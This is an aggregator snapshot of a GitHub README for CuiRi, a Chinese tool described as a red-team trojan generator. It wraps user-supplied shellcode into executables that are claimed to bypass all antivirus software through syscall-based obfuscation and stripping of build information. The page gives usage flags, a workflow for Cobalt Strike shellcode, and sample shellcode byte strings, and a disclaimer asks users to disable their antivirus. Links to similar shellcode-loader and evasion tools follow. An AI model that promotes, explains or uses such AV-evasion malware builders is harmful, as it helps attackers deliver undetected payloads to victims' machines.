GitHub - NyDubh3/CuiRi: 一款红队专用免杀木马生成器,基于shellcode生成绕过所有杀...
source link: https://github.com/NyDubh3/CuiRi
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
摧日:CuiRi 红队专用免杀木马生成工具
0x01 简介:
____ __ __ _____ ______ _____
/ ___) ) ) ( ( (_ _) ( __ \ (_ _)
/ / ( ( ) ) | | ) (__) ) | |
( ( ) ) ( ( | | ( __/ | |
( ( ( ( ) ) | | ) \ \ _ | |
\ \___ ) \__/ ( _| |__ ( ( \ \_)) _| |__
\____) \______/ /_____( )_) \__/ /_____(
摧日:一款红队专用免杀木马生成器,基于shellcode生成绕过所有杀软的木马
CuiRi 是一款红队专用免杀木马生成器,该工具可以通过红队人员提供的一段 shellcode 快速生成一个绕过所有杀软的可执行木马。
特点
- 1.基于 Syscall 进行免杀,且随机混淆,可过几乎所有杀软
- 2.内置 go-strip 对 Go 生成的木马进行编译信息抹除与程序信息混淆
- 3.工具本体只有 1 个 exe,搭配 Go 环境即可直接使用
感谢 go-strip 作者 @boy-hack
0x02 使用:
从 release 中下载二进制文件,并且在系统上安装 Go 语言环境,然后将 shellcode 保存到1个txt文件中,即可使用本工具生成免杀马。
____ __ __ _____ ______ _____
/ ___) ) ) ( ( (_ _) ( __ \ (_ _)
/ / ( ( ) ) | | ) (__) ) | |
( ( ) ) ( ( | | ( __/ | |
( ( ( ( ) ) | | ) \ \ _ | |
\ \___ ) \__/ ( _| |__ ( ( \ \_)) _| |__
\____) \______/ /_____( )_) \__/ /_____(
摧日:一款红队专用免杀木马生成器,基于shellcode生成绕过所有杀软的木马
警告:
1.本工具仅用于企业内部测试,请勿用于任何非法犯罪活动,否则后果自负
2.本工具需要Go语言环境,且使用时需要关闭杀软
https://github.com/NyDubh3/CuiRi Author:Dubh3
[INFO] Current Version: 1.0
Usage of CuiRi.exe:
-f string
通过shellcode生成免杀马
-manual
查看shellcode生成方法CuiRi 支持的 shellcode 格式分为以下两种:
1.C语言字符串格式 shellcode:
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52" "\x48\x31\xd2\x51\x65\x48\x8b\x52\x60\x56\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
2.纯十六进制数值格式 shellcode:
注意:如果是从 Cobalt Strike 中生成的 bin 文件,请单独将 bin 里的十六进制复制保存到一个 txt 文件中。
fce8 8900 0000 6089 e531 d264 8b52 308b 520c 8b52 148b 7228 0fb7 4a26 31ff 31c0 ac3c 617c 022c 20c1 cf0d 01c7 e2f0 5257 8b52 108b 423c 01d0 8b40 7885 c074 4a01 d050 8b48 188b 5820 01d3 e33c 498b 348b 01d6 31ff 31c0 acc1 cf0d 01c7 38e0 75f4 037d f83b 7d24 75e2 588b 5824 01d3 668b
0x03 演示:
(1) 生成 shellcode
(2) 生成免杀马
(3) 免杀效果
Recommend
-
59
今天给大家介绍的是一款名叫sRDI的注入工具,它可以基于Shellcode实现反射型DLL注入,并能够将DLL转换成独立的Shellcode。 工具介绍
-
56
今天给大家介绍的是一款名叫Xori的自动化反编译与静态分析工具,广大研究人员可以利用该工具来对PE32、32+和Shellcode进行审计分析。
-
31
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、
-
37
Shellcode加载器是一种基本的规避技术。尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为。例如,很多安全产品可能会在内存中时对其进行检测,或者将特定的网络流量检测为恶意。...
-
4
C#免杀之自实现DNS服务器传输shellcodeShare on: 相比于http协议,dns协议有着更好的隐蔽性。类比cs的dns beacon,我们可以自己实现一个dns服务器来传输shellcode。C#拥有一个优秀的第三方库ARSoft.Tools.Net。我们可以使用他...
-
6
DBJ大宝剑 定位:边界资产梳理工具 大宝剑的寓意:攻防利刃,简化繁琐操作解放双手,一键大保健~ bil...
-
8
ZheTian ZheTian Powerful remote load and execute ShellCode tool,免杀shellcode加载框架 -u string:从远程服务器加载base64混淆后的字节码。 -r string:从本地...
-
6
Shellcode-Encryptor:一款功能强大的Shellcode加密解密执行工具 Alpha_h4ck 2022-01-19 21:25:42 43919 2
-
7
免杀学习--powershell加载shellcode免杀 - Shu1L's blog Powered by Hexo | Theme - Even ©2015 - 2022...
-
3
这段时间测试了不少免杀的手法,但是对一些加载器的实现原理还没有完全理清,所以本文主要是学习总结原理和姿势,不测试实际免杀效果。 目前来看分离免杀仍然是主流的一种免杀方式,我们可以将shellcode比作子弹,那么枪也就是我们所说的加...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK